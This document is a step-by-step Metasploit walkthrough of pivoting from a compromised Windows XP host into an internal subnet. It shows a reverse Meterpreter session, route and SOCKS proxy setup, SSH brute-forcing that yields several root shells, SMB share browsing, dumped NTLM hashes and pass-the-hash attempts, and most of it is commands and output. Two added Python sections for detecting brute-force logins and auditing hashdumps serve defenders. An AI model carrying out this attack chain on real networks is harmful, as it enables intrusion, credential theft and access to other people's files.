Metasploit: accessing hosts across a router (pivoting)
First, obtain a shell on a host inside the internal network and escalate to SYSTEM privileges.
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.103:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.103:4444 -> 192.168.1.100:51898) at 2012-11-04 20:49:37 +0800
meterpreter > getuid
Server username: BRK-FC17123537C\Administrator
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Next, check which network segment the host is on.
meterpreter > ifconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter - 数据包计划程序微型端口
Hardware MAC : 00:50:56:28:2c:de
MTU : 1500
IPv4 Address : 5.5.5.9
IPv4 Netmask : 255.255.255.0
meterpreter >
Ping 5.5.5.9 to test.
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > ping 5.5.5.9
[*] exec: ping 5.5.5.9
^CInterrupt: use the 'exit' command to quit
msf exploit(handler) >
No response (the ping runs on the attacker's own machine, which has no route to 5.5.5.0/24). Next, look at the network information on the compromised host.
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > route
IPv4 network routes
===================
Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
0.0.0.0 0.0.0.0 5.5.5.2 10 2
5.5.5.0 255.255.255.0 5.5.5.9 10 2
5.5.5.9 255.255.255.255 127.0.0.1 10 1
5.255.255.255 255.255.255.255 5.5.5.9 10 2
127.0.0.0 255.0.0.0 127.0.0.1 1 1
224.0.0.0 240.0.0.0 5.5.5.9 10 2
255.255.255.255 255.255.255.255 5.5.5.9 1 2
No IPv6 routes were found.
meterpreter >
Find the local network subnets:
Local subnet: 5.5.5.0/255.255.255.0
There is only one subnet; let's try adding a route for it.
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > route add 5.5.5.0 255.255.255.0 1
[*] Route added
msf exploit(handler) > route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
5.5.5.0 255.255.255.0 Session 1
msf exploit(handler) >
Note: in msf exploit(handler) > route add 5.5.5.0 255.255.255.0 1, the trailing 1 is the session ID, not a metric or interface; don't get it wrong when adding the route.
Let's test it with a scan.
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
msf auxiliary(tcp) > set RHOSTS 5.5.5.0-254
RHOSTS => 5.5.5.0-254
msf auxiliary(tcp) > set PORTS 22,445,135,443,80,1433
PORTS => 22,445,135,443,80,1433
msf auxiliary(tcp) > exploit
[*] 5.5.5.1:445 - TCP OPEN
[*] 5.5.5.1:135 - TCP OPEN
[*] 5.5.5.1:443 - TCP OPEN
[*] 5.5.5.3:22 - TCP OPEN
[*] 5.5.5.3:80 - TCP OPEN
[*] 5.5.5.4:22 - TCP OPEN
[*] 5.5.5.5:22 - TCP OPEN
[*] 5.5.5.6:80 - TCP OPEN
[*] 5.5.5.6:135 - TCP OPEN
[*] 5.5.5.6:1433 - TCP OPEN
[*] 5.5.5.6:445 - TCP OPEN
----- omitted -----
Check the results:
msf auxiliary(tcp) > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
5.5.5.1 Unknown device
5.5.5.3 Unknown device
5.5.5.4 Unknown device
5.5.5.5 Unknown device
5.5.5.6 Unknown device
5.5.5.8 Unknown device
5.5.5.9 BRK-FC17123537C Microsoft Windows XP SP2 client
5.5.5.10 Unknown device
5.5.5.11 Unknown device
192.168.1.100 firewall
msf auxiliary(tcp) >
View the services:
msf auxiliary(tcp) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
5.5.5.1 135 tcp open
5.5.5.1 443 tcp open
5.5.5.1 445 tcp open
5.5.5.3 80 tcp open
5.5.5.3 22 tcp open
5.5.5.4 22 tcp open
5.5.5.5 22 tcp open
5.5.5.6 80 tcp open
5.5.5.6 135 tcp open
5.5.5.6 445 tcp open
5.5.5.6 1433 tcp open
5.5.5.8 443 tcp open
5.5.5.8 80 tcp open
5.5.5.8 22 tcp open
5.5.5.9 80 tcp open
5.5.5.9 135 tcp open
5.5.5.9 443 tcp open
5.5.5.9 445 tcp open
5.5.5.10 445 tcp open
5.5.5.10 135 tcp open
5.5.5.10 443 tcp open
5.5.5.10 80 tcp open
5.5.5.11 22 tcp open
msf auxiliary(tcp) >
We can work from the discovered services; quite a few hosts have SSH open. MSF's own scanner is painfully slow, so we can start a SOCKS proxy and let Nmap scan through it, for example:
msf > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options
Module options (auxiliary/server/socks4a):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on.
msf auxiliary(socks4a) > exit
[*] You have active sessions open, to exit anyway type "exit -y"
[*] Starting the socks4a proxy server
msf auxiliary(socks4a) >
Next we need the handy proxychains to push tools through the proxy. Edit the proxychains configuration file:
brk@Dis9Team:/tmp$ sudo nano /etc/proxychains.conf
Change the default proxy entry as follows:
socks4 127.0.0.1 1080
Test:
msf auxiliary(socks4a) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 BRK-FC17123537C\Administrator @ BRK-FC17123537C 192.168.1.103:4444 -> 192.168.1.100:51898 (5.5.5.9)
msf auxiliary(socks4a) >
Connect to port 445 of 5.5.5.9 through the proxy:
brk@Dis9Team:/tmp$ proxychains nc -vv 5.5.5.9 445
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.9:445-<><>-OK
Connection to 5.5.5.9 445 port [tcp/microsoft-ds] succeeded!
Success. Now probe with Nmap:
brk@Dis9Team:/tmp$ proxychains nmap -sP 5.5.5.0/24
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 6.00 ( http://nmap.org ) at 2012-11-04 21:27 CST
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.1:80-<--denied
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.4:80-<--denied
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.7:80-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.10:80-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.11:80-<--denied
Scan a single host:
brk@Dis9Team:/tmp$ sudo proxychains nmap 5.5.5.5 -sV -sT -T5 -O -PN
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:256-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:110-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:3306-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:8080-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:445-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:22-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:22-<><>-OK
Nmap scan report for 5.5.5.5
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
No OS matches for host
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds
brk@Dis9Team:/tmp$
SSH is open; let's try cracking it with MSF.
msf auxiliary(ssh_login) > exploit
[*] 5.5.5.5:22 SSH - Starting bruteforce
[*] 5.5.5.5:22 SSH - [1/4] - Trying: username: 'root' with password: ''
[-] 5.5.5.5:22 SSH - [1/4] - Failed: 'root':''
[*] 5.5.5.5:22 SSH - [2/4] - Trying: username: 'root' with password: 'root'
[-] 5.5.5.5:22 SSH - [2/4] - Failed: 'root':'root'
[*] 5.5.5.5:22 SSH - [3/4] - Trying: username: 'root' with password: '123456'
----- not shown -----
[*] Command shell session 2 opened (192.168.1.103-192.168.1.100:0 -> 5.5.5.5:22) at 2012-11-04 21:32:58 +0800
[+] 5.5.5.5:22 SSH - [3/4] - Success: 'root':'不给你看' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh Linux CENTOS 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:35 EDT 2010 i686 i686 i386 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) >
The SSH password was cracked successfully.
Try connecting:
msf auxiliary(ssh_login) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 BRK-FC17123537C\Administrator @ BRK-FC17123537C 192.168.1.103:4444 -> 192.168.1.100:51898 (5.5.5.9)
2 shell linux SSH root:不给你看 (5.5.5.5:22) 192.168.1.103-192.168.1.100:0 -> 5.5.5.5:22 (5.5.5.5)
msf auxiliary(ssh_login) > sessions -i 2
[*] Starting interaction with 2...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh
cat /proc/version
Linux version 2.6.18-194.el5 (mockbuild@builder16.centos.org) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Fri Apr 2 14:58:35 EDT 2010
lsb_release -a
LSB Version: :core-3.1-ia32:core-3.1-noarch:graphics-3.1-ia32:graphics-3.1-noarch
Distributor ID: CentOS
Description: CentOS release 5.5 (Final)
Release: 5.5
Codename: Final
It seems many hosts have SSH open, so let's scan them in bulk.
msf auxiliary(ssh_login) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 BRK-FC17123537C\Administrator @ BRK-FC17123537C 192.168.1.103:4444 -> 192.168.1.100:51898 (5.5.5.9)
3 shell linux SSH root:123456 (5.5.5.3:22) 192.168.1.103-192.168.1.100:0 -> 5.5.5.3:22 (5.5.5.3)
4 shell linux SSH root:a (5.5.5.8:22) 192.168.1.103-192.168.1.100:0 -> 5.5.5.8:22 (5.5.5.8)
5 shell linux SSH root:123456 (5.5.5.5:22) 192.168.1.103-192.168.1.100:0 -> 5.5.5.5:22 (5.5.5.5)
6 shell linux SSH root:123456 (5.5.5.4:22) 192.168.1.103-192.168.1.100:0 -> 5.5.5.4:22 (5.5.5.4)
7 shell linux SSH root:123456 (5.5.5.11:22) 192.168.1.103-192.168.1.100:0 -> 5.5.5.11:22 (5.5.5.11)
msf auxiliary(ssh_login) >
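From the defender's side, the ssh_login sweeps above leave a tell-tale trace on each CentOS target: a burst of "Failed password for root" lines from the pivot host 5.5.5.9 in /var/log/secure, followed within seconds by an "Accepted password". The Python detector below is an added example (not part of the original post) that runs over constructed sample log lines in that format; the hostname, PIDs, client ports and the year are made up.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in CentOS 5 /var/log/secure format (hostname, PIDs, ports made up;
# 5.5.5.9 is the pivot host from the walkthrough). Syslog omits the year, so one is assumed.
SAMPLE_LOG = """\
Nov  4 21:32:40 centos5 sshd[2201]: Failed password for root from 5.5.5.9 port 40211 ssh2
Nov  4 21:32:41 centos5 sshd[2203]: Failed password for root from 5.5.5.9 port 40212 ssh2
Nov  4 21:32:42 centos5 sshd[2205]: Failed password for root from 5.5.5.9 port 40213 ssh2
Nov  4 21:32:43 centos5 sshd[2207]: Accepted password for root from 5.5.5.9 port 40214 ssh2
Nov  4 21:40:01 centos5 sshd[2301]: Accepted publickey for admin from 5.5.5.20 port 51000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+"
)

def parse_events(text, year=2012):
    """Return (timestamp, result, user, src) tuples for sshd auth lines; other lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["src"]))
    return events

def detect_bruteforce(text, threshold=3, window_s=60, year=2012):
    """Flag sources with >= threshold failed logins within window_s seconds.
    Returns {src: {"failures": peak count in window, "users": set, "success_after": bool}}."""
    alerts = {}
    recent = defaultdict(list)  # src -> timestamps of failures still inside the window
    for ts, result, user, src in sorted(parse_events(text, year)):
        if result == "Failed":
            recent[src] = [t for t in recent[src] if (ts - t).total_seconds() <= window_s] + [ts]
            if len(recent[src]) >= threshold:
                a = alerts.setdefault(src, {"failures": 0, "users": set(), "success_after": False})
                a["failures"] = max(a["failures"], len(recent[src]))
                a["users"].add(user)
        elif src in alerts:
            # A success from an already-flagged source is a likely compromise, not just noise to block.
            alerts[src]["success_after"] = True
    return alerts

if __name__ == "__main__":
    for src, a in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{src}: {a['failures']} failures for {sorted(a['users'])}, success after: {a['success_after']}")
```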
What about the few Windows machines?
msf auxiliary(ssh_login) > services -p 445
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
5.5.5.1 445 tcp open
5.5.5.6 445 tcp open
5.5.5.9 445 tcp open
5.5.5.10 445 tcp open
msf auxiliary(ssh_login) >
Try SMB share enumeration:
msf auxiliary(smb_enumshares) > set RHOSTS 5.5.5.1
RHOSTS => 5.5.5.1
msf auxiliary(smb_enumshares) > run
[*] 5.5.5.1:445 ADMIN$ - 远程管理 (DISK), C$ - 默认共享 (DISK), D$ - 默认共享 (DISK), E$ - 默认共享 (DISK), F$ - 默认共享 (DISK), ftp - (DISK), H$ - 默认共享 (DISK), IPC$ - 远程 IPC (IPC)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_enumshares) >
Looks like there is something there.
Let's take a look.
Not sure whether it holds a list of the Zone 9 crowd; if it does, ban them all. Anyway, let's access it:
brk@Dis9Team:/tmp/123$ proxychains smbclient //5.5.5.1/ftp
ProxyChains-3.1 (http://proxychains.sf.net)
Enter brk's password:
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.1:445-<><>-OK
Domain=[DIS91] OS=[Windows 7 Ultimate 7601 Service Pack 1] Server=[Windows 7 Ultimate 6.1]
smb: \> dir
. D 0 Sun Nov 4 20:11:13 2012
.. D 0 Sun Nov 4 20:11:13 2012
1 D 0 Mon Oct 29 03:12:49 2012
1.rar A 5554064923 Sat Oct 27 16:35:12 2012
1.zip A 2165820895 Sun Oct 7 10:09:40 2012
2.iso A 728018944 Tue Oct 9 19:58:06 2012
2.zip A 1220728381 Sun Oct 14 00:41:59 2012
AspSweb.exe A 649745 Fri Aug 15 16:45:34 2008
burpsuite.jar A 8198291 Thu Sep 27 03:29:29 2012
CS1_5_chsV1.0.zip A 283779223 Sat Sep 29 15:19:44 2012
down D 0 Sun Sep 23 20:19:12 2012
ftp.zip A 11599105 Sun Sep 30 09:54:53 2012
HdReport.txt A 2479 Thu Sep 27 10:20:01 2012
kubuntu-12.04.1-desktop-amd64.iso A 736407552 Sun Sep 16 22:07:52 2012
My Games.zip A 3595119 Wed Oct 10 18:49:53 2012
TorchlightII_chsV1.11.5.3.zip A 1609147375 Wed Oct 10 18:48:25 2012
Ubuntu1.zip A 2833754852 Wed Oct 10 11:28:54 2012
users.dat A 74 Sun Oct 14 00:47:32 2012
VRMPVOL_CNsp2.iso A 621346816 Sat Sep 29 10:20:44 2012
yxdown.com_TorchlightII_chsV1.11.5.3.exe A 1590876064 Wed Sep 26 05:09:13 2012
浮生偷换.mp3 A 6303705 Sat Sep 15 21:21:19 2012
金粉沉埋.mp3 A 5532570 Sat Sep 15 22:49:35 2012
36381 blocks of size 4194304. 14743 blocks available
smb: \>
There are even Shui Yi's songs in there.
First, grab the account password hashes:
meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:54688ec262626f406dadd35533ff3375:19d7141e4c62b1f5318db46b6d0f1390:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:30f6b88b04ce59ef6e72ad5f4df330ee:::
meterpreter >
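What the hashdump above tells a defender before anyone tries pass-the-hash: Meterpreter prints user:rid:LM:NT:::, the constant aad3b435b51404eeaad3b435b51404ee is the LM field of an account with no LM hash stored, and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password. The Python audit below is an added example (not from the original post) run over the four lines shown above; it flags accounts that still have a legacy LM hash stored and accounts with empty passwords.

```python
# Audit of Meterpreter `hashdump` output (added example). Each record is user:rid:LM:NT:::.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_LM_HALF = EMPTY_LM[16:]                    # LM half produced by an empty 7-char block
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# The four records from the walkthrough's hashdump, used as sample input.
HASHDUMP = """\
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:54688ec262626f406dadd35533ff3375:19d7141e4c62b1f5318db46b6d0f1390:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:30f6b88b04ce59ef6e72ad5f4df330ee:::
"""

def parse_hashdump(text):
    """Return a list of {user, rid, lm, nt} dicts; lines that are not hashdump records are skipped."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit() or len(parts[2]) != 32 or len(parts[3]) != 32:
            continue
        accounts.append({"user": parts[0], "rid": int(parts[1]),
                         "lm": parts[2].lower(), "nt": parts[3].lower()})
    return accounts

def audit_hashdump(text):
    """Map each account name to a list of findings (an empty list means nothing was flagged)."""
    findings = {}
    for acct in parse_hashdump(text):
        issues = []
        if acct["lm"] != EMPTY_LM:
            # LM storage is still enabled on this host: fix by setting the LSA NoLMHash policy
            # and rotating the affected passwords so the old LM hashes are dropped.
            issues.append("lm_hash_stored")
            if acct["lm"][16:] == EMPTY_LM_HALF:
                # LM hashes are computed per 7-char half; an empty second half means the
                # password is at most 7 characters long, which a password policy should forbid.
                issues.append("password_at_most_7_chars")
        if acct["nt"] == EMPTY_NT:
            issues.append("empty_password")
        findings[acct["user"]] = issues
    return findings

if __name__ == "__main__":
    for user, issues in audit_hashdump(HASHDUMP).items():
        print(f"{user}: {', '.join(issues) or 'no findings'}")
```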
With these we can attempt a pass-the-hash attack:
msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.1.103:4444
[*] Connecting to the server...
[*] Authenticating to 5.5.5.9:445|WORKGROUP as user ''...
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
^Cmsf exploit(psexec) > set RHOST 5.5.5.6
RHOST => 5.5.5.6
msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.1.103:4444
[*] Connecting to the server...
[*] Authenticating to 5.5.5.6:445|WORKGROUP as user ''...
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
^Cmsf exploit(psexec) >
That failed; crack the password instead.